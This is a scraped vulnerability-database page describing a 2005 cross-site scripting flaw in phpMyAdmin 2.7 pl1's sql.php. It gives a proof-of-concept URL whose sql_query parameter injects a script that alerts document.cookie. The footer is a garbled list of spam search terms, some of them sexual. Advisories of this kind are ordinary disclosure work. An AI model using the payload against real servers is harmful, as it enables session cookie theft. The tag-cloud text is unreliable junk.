about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , PHPMyAdmin SQL.PHP Cross-Site Scripting Vulnerability


Title PHPMyAdmin SQL.PHP Cross-Site Scripting Vulnerability
Published 2005-10-31-12:00AM
Updated 2006-04-13-05:42PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  p0w3r is credited with the discovery of this vulnerability.
Vulnerable  phpMyAdmin phpMyAdmin 2.7 pl1
Not Vulnerable  
Code  
This issue can be exploited a web client.

The following proof-of-concept URI is available:

http://www.example.com//phpmyadmin/sql.php?lang=de-utf-8&server=1&collation_connection=utf8_general_ci&db=fu&table=fu&goto=tbl_properties_structure.php&back=tbl_properties_structure.php&sql
_query=SELECT+*+FROM+%60'%3Cscript%3Ealert(document.cookie)%3C/script%3E'%60
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 19:21:25 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.028cl. www.brosf. phpbb serv onine game News Searc sex vidos iss5 paksitan b WWW.sexey. hhlrg.cn sex vidos Www.woman www.sexyla 1.3.1 maxcpm.inf nude trish maxcpm.inf lo286l /component ynhub Indonesia teencorecl www.yzmoth Stack-base tinni-hill pornsexcli Shoo phost t5t ball honey u de chile wwwwwwwwww PHONO EROT javaprxy.d www.jshuwe video+of+z SEXTOONS.C kaspersky telugu vid www.aus888 emech www.arabic myclassifi www.putast search/exp maxcpm.inf iss pop3 v www.trish HORSE SEX sftpd video girl